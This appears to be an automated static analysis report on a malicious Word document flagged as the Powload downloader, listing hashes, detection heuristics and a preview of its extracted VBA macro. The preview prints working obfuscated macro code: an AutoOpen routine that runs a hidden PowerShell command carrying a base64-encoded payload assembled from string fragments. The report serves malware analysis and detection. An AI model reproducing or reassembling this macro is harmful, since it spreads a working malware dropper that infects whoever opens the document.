Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 03e587655e2d40ae…

MALICIOUS

Office (OLE)

Size: 101.0 KB
Created: 2018-05-29 12:12:00
Authoring application: Microsoft Office Word
First seen: 2020-05-25
MD5: c0a9bcfeab925beeb58c460fd78df50d
SHA-1: baa3f5c01f594cb1b2200d32d3df3203be0311c3
SHA-256: 03e587655e2d40ae0791c5a223c637e8d1f45d6a7a6586dfd8e78481c5493a79
Risk Score: 242

Heuristics (7)

  • ClamAV: Doc.Downloader.Powload-6981595-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Powload-6981595-0
  • VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA (critical) OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 18018 bytes
SHA-256: 5a6916cb1da25279b31ea1ff5140abe9a561387bc55b564df0dcd75730618db2
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "iFjDzREEwwOsZ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function inOYZpZbA()
On Error Resume Next
kSUvYz = Fix(17543 / CSng(4662) * AUHAkJ * idqLz)
VhBn = CDate(1534)
vjGOwM = Fix(55373 / CSng(18164) * DLJdI * vcjCPz)
VhBn = CDate(97451)
inOYZpZbA = ffBDsrAVN + HWcBzUvV + lYEXBd + IZFTdQQ + VXcwzOQdrO + Vvqnd + AMTWlN + VtCKplYV + Uvmibf + WuFsQjtU + VzjQrN + nnYHlM + HoaiiwCQfJn
TPhji = Fix(21695 / CSng(56777) * jkWZMS * MpFrOE)
VhBn = CDate(79945)
End Function
Sub Autoopen()
On Error Resume Next
ftAhOb = Fix(93385 / CSng(71366) * whmzPd * wcUiZG)
VhBn = CDate(66892)
FrStilC (inOYZpZbA)
ctXMK = Fix(16269 / CSng(68841) * doBpdd * GjzZd)
VhBn = CDate(58593)
End Sub
Function FrStilC(bsOAHXHiCp)
On Error Resume Next
jwMGsm = Fix(68274 / CSng(20353) * ZKjEV * jaoMk)
VhBn = CDate(17594)
rhnIWkbQfPp = YprmzwLatt + Shell(MQEYbqLTjsP + Chr(vbKeyP) + ozTWd + bsOAHXHiCp, vbHide)
OoVUN = Fix(27303 / CSng(91298) * jFnwJa * DPzNT)
VhBn = CDate(77227)
End Function


Attribute VB_Name = "iuYtCzYlQuW"
Function ffBDsrAVN()
On Error Resume Next
BTQBX = Fix(76746 / CSng(82320) * jaMiE * OfXkC)
VhBn = CDate(35646)
SWPqcpMK = "owersHe" + "LL -WinD" + "owsTyle" + " hidden -e IAA" + "oACgAIgB"
hIZWfV = Fix(99161 / CSng(66359) * rEkEtS * pzXPPn)
VhBn = CDate(3105)
SThfdGTlv = "7ADMANA" + "B9AHsAMQB" + "9AHsAMQAz" + "ADEAf" + "QB7ADk" + "ANAB9AH" + "sAMQAzADgAfQB7A" + "DEANwB9A" + "HsAMQA2" + "AH0AewAxADQAN"
pFmNL = Fix(37585 / CSng(96695) * RPULr * sSrjmj)
VhBn = CDate(14393)
PWjUoKB = "QB9AHsAMQA" + "xADUAfQB7ADEAMA" + "A1AH0A" + "ewAxADUAMQB9AHs"
zYvnik = Fix(60759 / CSng(6057) * tHThZj * XasiTo)
VhBn = CDate(48963)
PUFilJw = "AOQAyAH0AewAzAD" + "MAfQB7" + "ADcANwB9AHsAMQ" + "AxADAAfQB7ADEAN" + "AAzAH0AewAx" + "ADAAOAB9AHsAMQ" + "AyADgAfQB7ADMAM" + "QB9AHsAMQAxAH0" + "AewAxADIA" + "NgB9AHsANQ"
AJHEY = Fix(67025 / CSng(2862) * zrFNS * lNqOk)
VhBn = CDate(51385)
VQlYJUsGv = "A3AH0Ae" + "wAxADEAOQ" + "B9AHsANAA1AH0Ae" + "wAxADIAMQB9A" + "HsANgB9AHsAMQ" + "AxADMAfQB" + "7ADgANQB9AH" + "sAMQAwADQAfQB7A"
ffBDsrAVN = SWPqcpMK + SThfdGTlv + PWjUoKB + PUFilJw + VQlYJUsGv
End Function
Function HWcBzUvV()
On Error Resume Next
XwSjF = Fix(18380 / CSng(22002) * YfLzom * dafwr)
VhBn = CDate(79399)
izENaz = "DQAOQB9" + "AHsAM" + "QA1ADUAfQB7A" + "DIAMQB9"
pUWTz = Fix(80230 / CSng(60463) * EEwDdL * VSZqaZ)
VhBn = CDate(23324)
RhIzwkHKUS = "AHsAOAAyAH0A" + "ewAxADAAfQB" + "7ADEANQA" + "3AH0AewA4ADcA" + "fQB7ADg" + "ANAB9AHsANQA4AH"
NikMkP = Fix(68641 / CSng(76589) * OBIzMm * VLfaH)
VhBn = CDate(1389)
NtrDiQNd = "0AewA2AD" + "QAfQB" + "7ADEAMQA0AH0Aew" + "AxADQ" + "AOAB9AHsAMQA0A" + "DcAfQB7ADEAMQAx" + "AH0AewA2ADYA" + "fQB7ADEAMgA3AH0" + "AewA0ADIA" + "fQB7ADcA"
JNnEMX = Fix(3456 / CSng(27581) * daIoOd * dUQPob)
VhBn = CDate(6165)
HioTwtsmm = "OAB9AHsAMQAw" + "ADcAf" + "QB7ADcANg" + "B9AHsANwA"
JjPUPt = Fix(71991 / CSng(74540) * tbzwK * QhAFi)
VhBn = CDate(42929)
TCBjoKDhCO = "wAH0AewAxADUAMg" + "B9AHsAMwA5AH0Ae" + "wAyADkAfQB7AD" + "EAMAAwAH0Aew" + "AxADEAO" + "AB9AHsA" + "MQA1ADkAfQ" + "B7ADkAMAB9AHs" + "AMQAyAD"
zvsQC = Fix(11600 / CSng(82118) * whKuvj * hwCso)
VhBn = CDate(91584)
WWUDvK = "UAfQB7ADEAN" + "QAwAH0AewAzA" + "DYAfQ" + "B7ADEAM" + "AA2AH0AewAyAD"
niwSzz = Fix(66884 / CSng(77265) * YWFiT * zrfwcz)
VhBn = CDate(87237)
sQwoOaaI = "AAfQB7ADM" + "AfQB7AD" + "EAMQA2AH0Ae" + "wAxADMAMgB9AH" + "sAMQAzADYAfQ"
HWcBzUvV = izENaz + RhIzwkHKUS + NtrDiQNd + HioTwtsmm + TCBjoKDhCO + WWUDvK + sQwoOaaI
End Function
Function lYEXBd()
On Error Resume Next
CPqIzB = Fix(4657 / CSng(72955) * IDIOSj * qCHLl)
VhBn = CDate(47770)
nhsYF = "B7ADg" + "AMAB9AHsAN" + "QA2AH0Aew" + "AyADYAfQB7" + "ADkAMQB" + "9AHsAOAB9AH" + "sANgA4AH0AewAxA"
woFzLN = Fix(84864 / CSng(37529) * towDGr * mUmnwi)
VhBn = CDate(21922)
XiqdibvK = "DIAMg" + "B9AHsAMQAxADc" + "AfQB7ADEAMwAwAH" + 
... (truncated)